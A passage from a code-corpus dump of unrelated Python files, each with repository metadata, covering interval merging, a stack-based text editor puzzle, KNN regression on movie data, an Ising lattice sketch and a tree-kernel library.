    if len(args) < 1:
        # print() works on both Python 2 and 3 (original used a Python 2
        # print statement)
        print("file name expected")
        exit()
    filename = args[0]
    graph = parse_file_set(filename)
    print(connected_components_set(graph))
# Script entry point: pass the edge-list filename as the first argument.
if __name__=='__main__':
    main(sys.argv[1:])
| true |
4d21a80ca730c9db13c15559fb94d2101d9ca1ea | Python | ovbystrova/Infosearch | /Final project/preprocess.py | UTF-8 | 731 | 2.90625 | 3 | [] | no_license | import re
import pymorphy2 as pm
from nltk.tokenize import RegexpTokenizer
from nltk.corpus import stopwords
stopWords = set(stopwords.words('russian'))
morph = pm.MorphAnalyzer()
def preprocess(text):
    """Lowercase and tokenize `text`, drop punctuation and Russian
    stopwords, and return the lemmatized (normal-form) words."""
    text = text.lower()
    tokenizer = RegexpTokenizer(r'\w+')
    tokens = tokenizer.tokenize(text)
    # PERF FIX: use the module-level precomputed stopWords set -- the
    # original rebuilt stopwords.words('russian') for EVERY token, turning
    # the filter into an O(tokens * stopwords) file-backed lookup.
    filtered_words = [token for token in tokens if token not in stopWords]
    norm_words = [morph.parse(token)[0].normal_form for token in filtered_words]
    return norm_words
9814b0233d0960f9f4796e0ba2681a26ebc4460b | Python | ds-ga-1007/assignment7 | /hz1411/functions.py | UTF-8 | 2,719 | 3.6875 | 4 | [] | no_license | from exceptions import *
from interval import *
def isOverlapping(int1, int2):
    ''' check if 2 intervals are overlapping/adjacent so they can be merged

    Adjacency means a closed upper bound sits exactly one integer below a
    closed lower bound, e.g. [1,2] next to [3,4].
    '''
    # int1 ends right before int2 starts, both facing ends closed
    if int1.upper + 1 == int2.lower and int1.bound_upper == ']' and int2.bound_lower == '[':
        return True
    # BUG FIX: the original tested int2.upper + 1 == int2.lower (comparing
    # int2 with itself), so adjacency was never detected in this direction.
    elif int2.upper + 1 == int1.lower and int2.bound_upper == ']' and int1.bound_lower == '[':
        return True
    elif int1.upper < int2.lower or int1.lower > int2.upper:
        return False
    # touching endpoints with both sides open do not overlap
    elif int1.lower == int2.upper and int1.bound_lower == '(' and int2.bound_upper == ')':
        return False
    elif int2.lower == int1.upper and int2.bound_lower == '(' and int1.bound_upper == ')':
        return False
    else:
        return True
def mergeIntervals(int1, int2):
    '''Take 2 intervals from input and merge them. If they are not overlapping/adjacent,
    raise error. Then the function find the lower side and the upper side of the merged
    list separately, and return the merged list.
    '''
    if not isOverlapping(int1,int2):
        raise MergeError
    # Build the merged interval as a string like "[a,b)" and re-parse it
    # through the project's interval class at the end.
    intm = '' # merged list
    # find lower side of merged list: on a tie, a closed bracket wins
    if int1.lower == int2.lower:
        if int1.bound_lower == '[' or int2.bound_lower == '[':
            intm += '['+ str(int1.lower) + ','
        else:
            intm += '('+ str(int1.lower) + ','
    if int1.lower < int2.lower:
        intm += int1.bound_lower + str(int1.lower) + ','
    if int1.lower > int2.lower:
        intm += int2.bound_lower + str(int2.lower) + ','
    # find upper side of merged list: on a tie, a closed bracket wins
    if int1.upper == int2.upper:
        if int1.bound_upper == ']' or int2.bound_upper == ']':
            intm += str(int1.upper) + ']'
        else:
            intm += str(int1.upper) + ')'
    if int1.upper < int2.upper:
        intm += str(int2.upper) + int2.bound_upper
    if int1.upper > int2.upper:
        intm += str(int1.upper) + int1.bound_upper
    # NOTE(review): assumes interval() accepts this "[a,b]" string form --
    # defined in the project's interval module, not visible here.
    return interval(intm)
def mergeOverlapping(intervals):
    '''Sort the intervals by their lower bound, then repeatedly fuse each
    interval with its successor while they overlap or touch; returns the
    (in-place) merged list.
    '''
    intervals.sort(key=lambda iv: iv.lower)
    idx = 0
    while idx < len(intervals) - 1:
        if isOverlapping(intervals[idx], intervals[idx + 1]):
            # fuse with the neighbour and stay on the same index, since the
            # widened interval may swallow further successors
            intervals[idx] = mergeIntervals(intervals[idx], intervals[idx + 1])
            del intervals[idx + 1]
        else:
            idx += 1
    return intervals
def insert(intervals, newint):
    '''Append a new interval into list of intervals,
    then return the updated intervals that are sorted and merged'''
    intervals.append(newint)
    # mergeOverlapping sorts in place and collapses any overlap the new
    # interval introduced
    mergeOverlapping(intervals)
    return intervals
| true |
fc031552672fe0d163a5272b5df1744f29b8cd89 | Python | masinogns/boj | /algorithm/2.Data_Structure_1/BOJ_basic_19.py | UTF-8 | 2,155 | 4.125 | 4 | [] | no_license | """
BOJ_basic_19 : 에디터 : BOJ 1406
https://www.acmicpc.net/board/view/11623
참고 자료.
스택을 2개로 구현하여 커서를 기준으로 왼쪽은 왼쪽 스택, 오른쪽은 오른쪽 스택으로 칭하여 푼다.
커서의 이동 시, 삭제 시 그리고 추가 시 행위는 각 스택의 pop과 push로 이루어진다.
이 때, 각 pop된 요소들은 push 요소로 들어갈 수도 있음을 명심하자.
print("".join(stackL.stack) + "".join(stackR.stack))
http://mwultong.blogspot.com/2006/12/python-join-list-array.html
참고
"""
class Stack:
    """Minimal LIFO stack over a plain Python list (top is the last item)."""

    def __init__(self):
        self.stack = []

    def push(self, params):
        """Put a value on top of the stack."""
        self.stack.append(params)

    def pop(self):
        """Discard the top value; warn instead of raising when empty."""
        if self.stack:
            self.stack.pop()
        else:
            print("Do not continue pop")

    def front(self):
        """Return the top value, or the sentinel -10 when empty."""
        if self.stack:
            return self.stack[-1]
        return -10
# BOJ 1406 "editor": the cursor splits the text into a left stack (before
# the cursor, top = character just left of it) and a right stack (after).
if __name__ == '__main__':
    stackL = Stack()
    stackR = Stack()
    inString = list(input())
    N = int(input())
    stackL.stack = inString[:]
    for number in range(N):
        inCommand = input().split()
        command = inCommand[0]
        if len(inCommand) == 2:
            params = inCommand[1]
        if command == "L":
            # cursor left: the character left of the cursor crosses right
            if len(stackL.stack) != 0:
                front = stackL.front()
                stackL.pop()
                stackR.push(front)
        elif command == "D":
            # cursor right: the character right of the cursor crosses left.
            # BUG FIX: the original read stackL.front() here, moving a copy
            # of the wrong character.
            if len(stackR.stack) != 0:
                front = stackR.front()
                stackR.pop()
                stackL.push(front)
        elif command == "B":
            # backspace: delete the character left of the cursor
            if len(stackL.stack) != 0:
                stackL.pop()
        elif command == "P":
            stackL.push(params)
    #print(stackL.stack + stackR.stack)
    # BUG FIX: the right stack holds its characters in reverse string
    # order (most recently crossed character on top), so it must be
    # reversed when reassembling the final text.
    print("".join(stackL.stack) + "".join(reversed(stackR.stack)))
| true |
a3c1ea99c8fd6dc1d89b165a8e84df1a07536004 | Python | andva/advent | /2020/3/a.py | UTF-8 | 401 | 2.734375 | 3 | [] | no_license | import math
import numpy as np
def main():
    # Advent of Code 2020 day 3 (part 1): walk the grid in input.txt with
    # the slope "right 3, down 1" and count the trees ('#') that are hit.
    f = open("input.txt")
    i = 0
    nHit = 0
    for line in f:
        nCols = len(line)
        modL = list(line)
        # mark the visited cell: 'X' for a hit tree, '0' for open ground
        if line[i] == '#':
            nHit += 1
            modL[i] = "X"
        else:
            modL[i] = "0"
        print("".join(modL))
        # advance 3 columns with wrap-around; nCols - 1 excludes the
        # trailing newline from the repeating-pattern width
        i = (i + 3) % (nCols - 1)

    print(str(nHit))


if __name__ == "__main__":
    main()
| true |
3a0f042c06ef181633b962807331c4cad4a6a146 | Python | vral-parmar/Basic-Python-Programming | /Configuration_using_python/test.py | UTF-8 | 473 | 2.75 | 3 | [] | no_license | #import class
from configparser import ConfigParser
# create an instance of ConfigParser class.
parser = ConfigParser()

# read and parse the configuration file.
# (read() returns the list of files successfully parsed; the original had
# a stray no-op list literal here left over from a REPL session - removed.)
parser.read('Configuration_using_python/conf.ini')

# get option value in specified section.
mysql_conn_host = parser.get('mysql_conn', 'host')
# print option values
print(mysql_conn_host)

# get user account info
account = parser.get('account', 'user_name')
print(account)
| true |
8c2ca5692c6f57ea6822fda857c18b5ff1616cc3 | Python | jpinedaa/Box-Office-Prediction | /KNN_model.py | UTF-8 | 2,306 | 2.84375 | 3 | [] | no_license | import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import itertools
from sklearn.model_selection import train_test_split
from sklearn.neighbors import KNeighborsRegressor
from sklearn.metrics import mean_squared_error, r2_score
from sklearn import decomposition
from sklearn.model_selection import KFold
from sklearn.preprocessing import StandardScaler
from math import sqrt
import random
# semicolon-separated movie data file ("12-18" presumably 2012-2018 -- TODO confirm)
dataset = pd.read_table('data/movies_data_12-18.csv', sep=';')
def append_feature(X, feature, dataset):
    """Append column ``feature`` of ``dataset`` to ``X`` as integer codes.

    Each distinct value in the column gets an integer category code; the
    codes are appended to ``X`` as one extra column and the widened array
    is returned (``X`` itself is not modified).
    """
    # sorted() makes the code assignment deterministic across runs;
    # the original used plain set iteration order, which varies between
    # interpreter invocations (hash randomization).
    feature_set = sorted(set(dataset.iloc[:, feature].values))
    feature_org = dataset.iloc[:, feature].values
    feature_con = [[feature_set.index(entry)] for entry in feature_org]
    return np.append(X, feature_con, 1)
def run_knn(dataset, features, neighbors, appendable_features = [], enable_scaler = False, PCA = 0):
    # 10-fold cross-validated KNN regression over the given feature columns.
    # Returns the six metrics [test MSE, test R2, test RMSE, train MSE,
    # train R2, train RMSE] averaged over the folds.
    # NOTE(review): mutable default for appendable_features -- harmless as
    # long as callers never mutate it, since it is only iterated here.
    X = dataset.iloc[:, features].values
    # column 7 is used as the regression target
    y = dataset.iloc[:, 7].values
    for f in appendable_features:
        X = append_feature(X, f, dataset)
    if enable_scaler:
        scaler = StandardScaler()
        scaler.fit(X)
        X = scaler.transform(X)
    if PCA != 0:
        pca = decomposition.PCA(n_components=PCA)
        X = pca.fit_transform(X)
    info = []
    #X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.20)
    kf = KFold(n_splits=10, shuffle=True)
    for train, test in kf.split(X):
        X_train = X[train]
        X_test = X[test]
        y_train = y[train]
        y_test = y[test]
        model = KNeighborsRegressor(n_neighbors=neighbors)
        model.fit(X_train, y_train)
        y_pred_train = model.predict(X_train)
        y_pred = model.predict(X_test)
        # one row of six metrics per fold (test first, then train)
        info_row = [mean_squared_error(y_test, y_pred), r2_score(y_test, y_pred), sqrt(mean_squared_error(y_test, y_pred)), mean_squared_error(y_train, y_pred_train), r2_score(y_train, y_pred_train), sqrt(mean_squared_error(y_train, y_pred_train))]
        info.append(info_row)
    # average the six metrics over the folds
    # NOTE(review): the hard-coded 10s assume n_splits stays 10
    stats = [0, 0, 0, 0, 0, 0]
    for i in range(10):
        for j in range(6):
            stats[j] += info[i][j]
    for j in range(6):
        stats[j] /= 10
    return stats


# one run on feature columns 6, 11, 12 plus encoded column 3, with scaling
stats = run_knn(dataset, [6, 11, 12], 10, [3], True)
print(stats)
6ec27a508c449122976f0b6eb6620ff92e527223 | Python | StephenWasntAvailable/CompSim18_19 | /Ising Project/Ising2018Alternate.py | UTF-8 | 1,557 | 2.859375 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Wed Oct 31 21:22:36 2018
@author: Stephen
"""
import numpy as np
import matplotlib.pyplot as plt
import scipy
import random
class IsingPointSimple:
    """One lattice site of the 2-D nearest-neighbour, colinear-spin Ising
    model: grid coordinates, spin value, and the flip bookkeeping fields."""

    def __init__(self, x, y, spin, didflip, flipcause):
        self.x, self.y = x, y
        self.spin = spin
        self.didflip, self.flipcause = didflip, flipcause
class IsingLatticeSimple:
    """Class representing the overall lattice, built up of a set of IsingPointSimple objects"""

    def __init__(self, size, temp, spins, lattice):
        # lattice == 0 means "build a fresh random lattice"; otherwise the
        # fields of an existing IsingLatticeSimple are copied (by reference).
        if lattice == 0:
            self.size = size
            self.temp = temp
            self.spins = spins
            # bugfix: np.zeros() makes a float array, and assigning an
            # IsingPointSimple into it raises TypeError (no __float__);
            # an object-dtype array can actually hold the point instances.
            self.lattice = np.empty((self.size, self.size), dtype=object)
            for i in range(size):
                for j in range(size):
                    self.lattice[i][j] = IsingPointSimple(i, j, random.choice(self.spins), 0, 0)
        else:
            self.size = lattice.size
            self.temp = lattice.temp
            self.spins = lattice.spins
            self.lattice = lattice.lattice

    # selfnp.array([[random.choice(self.spins) for i in range(self.size)] for i in range(self.size)])
    def show_lattice(self):
        # NOTE(review): imshow cannot render an object array of point
        # instances; plotting the spins would need something like
        # np.vectorize(lambda p: p.spin)(self.lattice) -- confirm intent.
        plt.imshow(self.lattice, shape = 'circle',interpolation = 'nearest')
# smoke test: build a 10x10 lattice at temperature 2 and try to display it
testlattice = IsingLatticeSimple(10, 2, [1, -1], 0)
testlattice.show_lattice()
6887b0ef8101db348540c1a9afd1bbdbae83341d | Python | rgtjf/Semantic-Texual-Similarity-Toolkits | /stst/libs/kernel/tree.py | UTF-8 | 18,695 | 3.40625 | 3 | [
"MIT"
] | permissive | # coding: utf8
"""
A set of Classes to handle trees and compute kernel functions on them
"""
from __future__ import print_function
import random
import bisect
class TreeNode:
    # A simple class for handling tree nodes
    # NOTE(review): the mutable default `chs=[]` is shared by every call
    # that omits it; safe only while callers never mutate a
    # default-constructed child list in place.
    def __init__(self, val=None, chs=[]):
        self.val = val # node label
        self.chs = chs # list of children of the node

    @classmethod
    def fromPrologString(cls, s):
        # to be invoked as tree.TreeNode.fromPrologString(s)
        # where s is the string encoding the tree
        # The format is as follows:
        # an optional leading integer target followed by a space is
        # skipped; the rest is a(b,c(...)) style nesting.
        s = s.rstrip('\n') # remove trailing newlines
        i, tmps, lens = (0, "", len(s))
        while i < lens and s[i] in "-+0123456789":
            tmps += s[i]
            i += 1
        if i >= lens or s[i] != " ":
            i = 0
        else:
            i += 1
        # aa is the stack of currently-open ancestor nodes
        aa = []
        while (i < lens):
            tmps = ""
            while (i < lens) and s[i] not in ('(', ')', ','):
                tmps += s[i]
                i += 1
            if len(tmps) > 0:
                t = cls(tmps, [])
                if len(aa) > 0:
                    aa[-1].chs.append(t)
            if i < lens:
                if s[i] == '(':
                    aa.append(t)
                elif s[i] == ')':
                    t = aa.pop()
                elif s[i] == ',':
                    pass
            i += 1
        return t

    def tostring_prolog(self):
        # returns a string in which the subtree rooted
        # at self is represented in prolog-style
        if not self:
            return
        stri = ""
        # if hasattr(self,'chs') and
        if self.chs:
            stri += "%s(" % self.val
            for i, c in enumerate(self.chs):
                stri += c.tostring_prolog()
                if i < len(self.chs) - 1:
                    stri += ","
            stri += ")"
        else:
            stri += "%s" % self.val
        return stri

    def __str__(self):
        # return the tree in prolog format
        return self.tostring_prolog()

    def tostring_svmlight(self):
        # returns a string in which the subtree rooted
        # at self is represented in svmlight-style
        if not self:
            return
        stri = ""
        if self.chs:
            stri += "(%s " % self.val
            for i, c in enumerate(self.chs):
                stri += c.tostring_svmlight()
            stri += ")"
        else:
            stri += "(%s -)" % self.val
        return stri

    def getLabel(self):
        return self.val

    def getChild(self, i):
        return self.chs[i]

    def getChildren(self):
        return self.chs

    def getOutdegree(self):
        # number of direct children
        if not self:
            return 0
        else:
            return len(self.chs)

    def getMaxOutdegree(self):
        # largest outdegree anywhere in the subtree rooted at self
        if not self:
            return 0
        else:
            m = self.getOutdegree()
            for c in self.chs:
                m = max(m, c.getMaxOutdegree())
            return m

    def getNodeLabelList(self):
        # returns the list of labels of all descendants of self
        if not self: return []
        p = [self.val]
        for c in self.chs:
            p.extend(c.getNodeLabelList())
        return p

    def labelList(self):
        # returns the list of labels of all descendants of self
        # (here paired with the node itself: (label, node))
        if not self: return []
        p = [(self.val, self)]
        for c in self.chs:
            p.extend(c.labelList())
        return p

    def getProduction(self):
        # return the label of the node concatenated with the labels of its children
        if not self: return ""
        self.production = self.val + "(" + ','.join([c.val for c in self.chs]) + ")"
        return self.production

    def productionlist(self):
        # returns the list of productions of all nodes
        # in the subtree rooted at self
        if not self: return []
        p = [(self.getProduction(), self)]
        for c in self.chs:
            p.extend(c.productionlist())
        return p

    def getSubtreeSize(self):
        # returns the number of nodes in the subtree rooted at self
        if not self:
            return 0
        n = 1
        for c in self.chs:
            n += c.getSubtreeSize()
        return n

    def setSubtreeSize(self):
        # returns the number of nodes in the subtree rooted at self
        # for each visited node A such value is stored in A.stsize
        if not self:
            self.stsize = 0
            return 0
        n = 1
        for c in self.chs:
            n += c.setSubtreeSize()
        self.stsize = n
        return n

    def setSubtreeRoutes(self, r=""):
        # store in each node the "route" from the root: the 1-based child
        # indices along the path, '#'-separated
        self.route = r
        i = 1
        for c in self.chs:
            c.setSubtreeRoutes(r + str(i) + "#")
            i += 1

    def getDepth(self):
        if not hasattr(self, 'depth'):
            print("ERROR: node depth has not been computed!")
            return ""
        return self.depth

    def setDepth(self, subtreerootdepth=0):
        # compute the depth (w.r.t self) of the descendants of self
        if not self:
            return
        self.depth = subtreerootdepth
        for c in self.chs:
            c.setDepth(subtreerootdepth + 1)
        return

    def height(self):
        # returns the length of the longest path
        # connecting self to its farthest leaf
        if not self:
            return 0
        p = 0
        for c in self.chs:
            p = max(p, c.height())
        return p + 1

    def getSubtreeID(self):
        # valid only after setHashSubtreeIdentifier() has run
        return self.subtreeId

    def getLabelFrequencies(self):
        # label -> occurrence count over the subtree rooted at self
        lab = {}
        lab[self.val] = 1
        for c in self.chs:
            l = c.getLabelFrequencies()
            for lk in l.keys():
                if not lk in lab:
                    lab[lk] = l[lk]
                else:
                    lab[lk] += l[lk]
        return lab

    def getHashSubtreeIdentifier(self, sep):
        # compute an hash value from the label of the node
        # self and the hash values of the children of self
        # NOTE(review): the recursive call below omits the `sep` argument,
        # so this method raises TypeError on any node with children;
        # setHashSubtreeIdentifier() is the working variant.
        if not self: return
        stri = self.val
        for c in self.chs:
            stri += sep + c.getHashSubtreeIdentifier()
        return str(hash(stri))

    def setHashSubtreeIdentifier(self, sep):
        # compute an hash value from the label of the node
        # self and the hash values of the children of self
        # For each visited node A the hash value is stored
        # into A.hash
        if not self: return
        stri = self.val
        if stri.find(sep) != -1:
            print("ERROR: identifier " + sep + "used in label. Please set it with setHashSep(newsep)")
        for c in self.chs:
            stri += sep + c.setHashSubtreeIdentifier(sep)
        self.subtreeId = str(hash(stri))
        return self.subtreeId

    def computeSubtreeIDSubtreeSizeList(self):
        # compute a list of pairs (subtree-hash-identifiers, subtree-size)
        if not self:
            return
        p = [(self.subtreeId, self.stsize)]
        for c in self.chs:
            p.extend(c.computeSubtreeIDSubtreeSizeList())
        return p

    def computeSubtreeIDSubtreeSizeRouteList(self):
        # tuples (label, subtree-id, subtree-size, depth, route) per node;
        # requires setSubtreeSize/setDepth/setSubtreeRoutes to have run
        if not self:
            return
        p = [(self.val, self.subtreeId, self.stsize, self.depth, self.route)]
        for c in self.chs:
            p.extend(c.computeSubtreeIDSubtreeSizeRouteList())
        return p

    def computeSubtreeIDSubtreeSizeRouteRouteHashList(self, h):
        # as above, plus a per-position hash h propagated down the tree
        if not self:
            return
        p = [(self.val, self.subtreeId, self.stsize, self.depth, self.route, h)]
        i = 1
        for c in self.chs:
            p.extend(c.computeSubtreeIDSubtreeSizeRouteRouteHashList(str(hash(h + "#" + str(i)))))
            i += 1
        return p

    def computeSubtreePositionIDLabelSubtreeSizeList(self, h):
        # compute a hash whose key is the subtree-position-identifier and the value
        # is a triplet (subtree-hash-identifiers, node depth, subtree-size)
        # A key is constructed for each node
        if not self:
            return
        p = {}
        p[h] = (self.subtreeId, self.getDepth(), self.stsize)
        i = -1
        for c in self.chs:
            i += 1
            p.update(c.computeSubtreePositionIDLabelSubtreeSizeList(str(hash(h + "#" + str(i)))))
        return p

    def computeSubtreePositionIDSubtreeIDSubtreeSizeListLabel(self, h):
        # forward map position-hash -> (subtree-id, size) and inverse map
        # subtree-id -> position-hash, computed together
        if not self:
            return
        p, pinv = ({}, {})
        p[h] = (self.subtreeId, self.stsize)
        pinv[self.subtreeId] = h
        i = -1
        for c in self.chs:
            i += 1
            (tmpp, tmppinv) = c.computeSubtreePositionIDSubtreeIDSubtreeSizeListLabel(str(hash(h + "#" + str(i))))
            p.update(tmpp)
            pinv.update(tmppinv)
        return (p, pinv)

    def computeSubtreeIDTreeNodeList(self):
        # NOTE(review): the recursive call below targets
        # computeSubtreeIDTreeNode (no "List"), which does not exist --
        # AttributeError on any node with children; verify before use.
        if not self:
            return
        p = [(self.subtreeId, self)]
        for c in self.chs:
            p.extend(c.computeSubtreeIDTreeNode())
        return p
class RandomTrees():
    # A class for generating random trees
    # p: probability that a node is created at the root level;
    # d: per-level decay factor applied to that probability;
    # outdegree: maximum number of children attempted per node;
    # nodelabels: pool of labels drawn uniformly at random.
    def __init__(self, p, d, outdegree, nodelabels):
        self.p = p
        self.d = d
        self.outdegree = outdegree
        self.nodelabels = nodelabels

    def __newTree(self, p):
        # with probability 1-p this subtree is not created at all
        if random.random() > p:
            return None
        chs = []
        for i in range(self.outdegree):
            t = self.__newTree(p * self.d)
            if t: chs.append(t)
        return TreeNode(self.randomLabel(), chs)

    def newTree(self):
        # retry until the root actually materializes
        t = self.__newTree(self.p)
        while not t:
            t = self.__newTree(self.p)
        return t

    def randomLabel(self):
        return random.choice(self.nodelabels)
class RandomTreesPowerLawDistribution(RandomTrees):
    # A class for generating random trees where labels are selected
    # randomly according zipf distribution (first elements
    # have much higher probability to be selected than last ones)
    def __init__(self, p, d, outdegree, numberoflabels):
        RandomTrees.__init__(self, p, d, outdegree, [])
        s = 0.99
        # self.labelfrequency = [0]*numberoflabels
        # unnormalized zipf weights 1/i^s for i = 1..numberoflabels
        self.nodelabels = [1 / (i ** s) for i in range(1, numberoflabels + 1)]
        norm = sum(self.nodelabels)
        self.nodelabels = [x / norm for x in self.nodelabels]
        # turn the normalized weights into a cumulative distribution so
        # randomLabel() can sample it with bisect (inverse-CDF sampling)
        cpd = 0
        for i in range(0, numberoflabels):
            cpd += self.nodelabels[i]
            self.nodelabels[i] = cpd

    def randomLabel(self):
        # the label is the index of the first cumulative weight that
        # exceeds a uniform draw
        r = bisect.bisect(self.nodelabels, random.random())
        # self.labelfrequency[r] += 1
        return r
class Tree:
    # A tree instance suitable for being processed by a tree kernel
    # A TreeNode retain properties of single nodes, a Tree a property
    # of a set of nodes: max/average outdegree, max depth
    def __init__(self, root, target=""):
        self.root = root
        self.target = target

    @classmethod
    def fromPrologString(cls, s):
        # to be invoked as tree.Tree.fromPrologString(s)
        # where s is the string encoding the tree
        # (an optional leading integer followed by a space is the target)
        target, i, tmps = ("", 0, "")
        while s[i] in "-+0123456789":
            tmps += s[i]
            i += 1
        if len(tmps) > 0 and s[i] == " ":  # the target is valid
            target = tmps
        return cls(TreeNode.fromPrologString(s), target)

    def deleteRootTreeNode(self):
        self.root = None

    def getMaxDepth(self):
        # bugfix: the cached value is stored on the Tree itself (see
        # setMaxDepth), but the original tested
        # hasattr(self.root, 'maxdepth'), which is never true -- so the
        # height was recomputed on every call and the cache never used.
        if not hasattr(self, 'maxdepth'):
            return self.root.height()
        else:
            return self.maxdepth

    def computeNodesDepth(self):
        self.root.setDepth()

    def setMaxDepth(self):
        # cache the tree height on the Tree instance
        self.maxdepth = self.root.height()

    def getMaxOutdegree(self):
        if not self.root:
            return 0  # ERROR?
        else:
            return self.root.getMaxOutdegree()

    def getLabelFrequencies(self):
        if not self.root:
            return {}
        else:
            return self.root.getLabelFrequencies()

    def __str__(self):
        # "<target> <prolog tree>" when a target is present
        if self.target:
            return str(self.target) + " " + str(self.root)
        else:
            return str(self.root)

    def printFormat(self, frmt="prolog"):
        # render the tree either in prolog style or in svmlight style
        s = ""
        if self.target:
            s = str(self.target) + " "
        if frmt == "prolog":
            s += self.root.tostring_prolog()
        elif frmt == "svmlight":
            s += "|BT| " + self.root.tostring_svmlight() + " |ET| "
        return s

    def computeSubtreeIDs(self, hashsep):
        self.root.setHashSubtreeIdentifier(hashsep)

    def computeRoutes(self, r=""):
        self.root.setSubtreeRoutes(r)
class SubtreeIDSubtreeSizeList():
    """Flat list of (subtree-id, subtree-size) pairs for every node of the
    tree rooted at *root* (ids/sizes must have been precomputed)."""

    def __init__(self, root):
        self.sids = root.computeSubtreeIDSubtreeSizeList()

    def getSubtreeID(self, i):
        sid, _size = self.sids[i]
        return sid

    def getSubtreeSize(self, i):
        _sid, size = self.sids[i]
        return size

    def sort(self):
        # plain lexicographic sort on the (id, size) tuples
        self.sids.sort()

    def __len__(self):
        return len(self.sids)
class ProdSubtreeList():
    # pairs each node's production string with the node itself
    def __init__(self, root):
        self.prodorderedlist = root.productionlist()

    def getProduction(self, i):
        return self.prodorderedlist[i][0]

    def getTree(self, i):
        return self.prodorderedlist[i][1]

    def sort(self):
        # two stable passes: by production string, then by its length, so
        # the final order is length-major, lexicographic within a length.
        # key= replaces the Python-2-only cmp= keyword of the original
        # while producing exactly the same ordering.
        self.prodorderedlist.sort(key=lambda x: x[0])
        self.prodorderedlist.sort(key=lambda x: len(x[0]))

    def __len__(self):
        return len(self.prodorderedlist)

    def compareprods(x, y):
        # NOTE(review): dead legacy comparator -- declared like a method
        # but takes no self and relies on the Python 2 builtin cmp();
        # nothing in this module calls it.
        if len(x[0]) == len(y[0]):
            return cmp(x[0], y[0])
        else:
            return cmp(len(x[0]), len(y[0]))
class LabelSubtreeList():
    # pairs each node's label with the node itself
    def __init__(self, root):
        self.labelList = root.labelList()

    def getLabel(self, i):
        return self.labelList[i][0]

    def getTree(self, i):
        return self.labelList[i][1]

    def sort(self):
        # key= replaces the Python-2-only cmp= keyword of the original;
        # ordering by the label (element 0) is unchanged
        self.labelList.sort(key=lambda x: x[0])

    def __len__(self):
        return len(self.labelList)
class SubtreePositionIDLabelSubtreeSizeList():
    # maps each subtree-position hash to (subtree-id, depth, subtree-size)
    def __init__(self, root):
        self.sids = root.computeSubtreePositionIDLabelSubtreeSizeList(str(hash('0')))

    def getSubtreeID(self, i):
        # NOTE(review): sids[i] is (subtreeId, depth, stsize), so
        # sids[i][0][0] yields the first character of the id string --
        # this getter (and getSubtreeSize below) looks inconsistent with
        # how the dictionary is built; verify against callers.
        return self.sids[i][0][0]

    def getLabel(self, i):
        # NOTE(review): element 1 is the node depth, not a label
        return self.sids[i][1]

    def getSubtreeSize(self, i):
        return self.sids[i][0][2]

    def __len__(self):
        return len(self.sids)
class SubtreePositionIDSubtreeIDSubtreeSizeListLabel():
    """Forward map (position hash -> (subtree id, size)) together with the
    inverse map (subtree id -> position hash) for every node under root."""

    def __init__(self, root):
        forward, inverse = root.computeSubtreePositionIDSubtreeIDSubtreeSizeListLabel(str(hash('0')))
        self.sids = forward
        self.pinv = inverse

    def getSubtreeID(self, i):
        sid, _size = self.sids[i]
        return sid

    def getPositionID(self, label):
        return self.pinv[label]

    def getSubtreeSize(self, i):
        _sid, size = self.sids[i]
        return size

    def __len__(self):
        return len(self.sids)
class SubtreeIDSubtreeSizeRouteList():
    # Currently used by Tree Kernel class PdakMine
    # holds tuples (label, subtree-id, size, depth, route, route-hash)
    def __init__(self, root):
        self.sids = root.computeSubtreeIDSubtreeSizeRouteRouteHashList("0")

    def getLabel(self, i):
        return self.sids[i][0]

    def getSubtreeID(self, i):
        return self.sids[i][1]

    def getSubtreeSize(self, i):
        return self.sids[i][2]

    def getDepth(self, i):
        return self.sids[i][3]

    def getRoute(self, i):
        return self.sids[i][4]

    def getRouteHash(self, i):
        return self.sids[i][5]

    def sort(self):
        # first a stable pass on the subtree id, then a full-tuple sort,
        # exactly as the original two-pass sort did; key= replaces the
        # Python-2-only cmp= keyword
        self.sids.sort(key=lambda x: x[1])
        self.sids.sort()

    def __len__(self):
        return len(self.sids)
class Dataset():
    # A class for handling a collection of Tree Objects
    def __init__(self, treeList=None):
        # fresh list per instance; the original used a mutable default
        # argument (treeList=[]) shared across all default constructions
        self.examples = [] if treeList is None else treeList

    def loadFromFilePrologFormat(self, filename):
        # read one prolog-encoded tree per line of `filename`
        self.filename = filename
        self.examples = []
        f = open(filename, "r")
        for line in f:
            self.examples.append(self.loadExamplePrologFormat(line))
        f.close()

    def generateRandomDataset(self, randObj, numberofexamples):
        # draw trees from a RandomTrees-like generator; target is always 1
        self.examples = []
        for i in range(numberofexamples):
            self.examples.append(Tree(randObj.newTree(), 1))

    def getExample(self, i):
        return self.examples[i]

    def loadExamplePrologFormat(self, line):
        return Tree.fromPrologString(line)

    def __len__(self):
        # the original defined __len__ twice with identical bodies;
        # the duplicate definition has been removed
        return len(self.examples)

    def getTotalNumberOfNodes(self):
        # total node count over all examples, cached once
        # setTotalNumberOfNodes() has been called
        if hasattr(self, 'totalnodes'):
            return self.totalnodes
        else:
            s = 0
            for i in range(len(self.examples)):
                s += self.examples[i].root.getSubtreeSize()
            return s

    def setTotalNumberOfNodes(self):
        self.totalnodes = self.getTotalNumberOfNodes()

    def getNodesNumberAverage(self):
        return self.getTotalNumberOfNodes() / len(self.examples)

    def getNodesNumberVariance(self):
        # NOTE(review): relies on len(example) for single examples, but
        # Tree defines no __len__ -- verify before use
        avg = self.getNodesNumberAverage()
        s = 0
        for i in range(len(self.examples)):
            s += (avg - len(self.examples[i])) ** 2
        return s / (len(self.examples))

    def getAverageMaxOutdegree(self):
        # NOTE(review): despite the name this returns the SUM of the
        # per-example max outdegrees (never divided by the count)
        o = 0
        for i in range(len(self.examples)):
            o += self.examples[i].getMaxOutdegree()
        return o

    def getMaxMaxOutdegree(self):
        o = 0
        for i in range(len(self.examples)):
            o = max(o, self.examples[i].getMaxOutdegree())
        return o

    def getMaxAndAverageMaxOutdegree(self):
        # NOTE(review): as above, the first value is a sum, not an average
        o, m = (0, 0)
        for i in range(len(self.examples)):
            cm = self.examples[i].getMaxOutdegree()
            o += cm
            m = max(m, cm)
        return o, m

    def random_permutation(self, seed):
        pass

    def getLabelFrequencies(self):
        # merge the per-example label frequency dictionaries
        lab = {}
        for i in range(len(self.examples)):
            l = self.examples[i].getLabelFrequencies()
            for lk in l.keys():
                if lk not in lab:
                    lab[lk] = l[lk]
                else:
                    lab[lk] += l[lk]
        return lab

    def getStats(self):
        # "avg-nodes total-nodes max-outdegree summed-max-outdegree"
        self.setTotalNumberOfNodes()
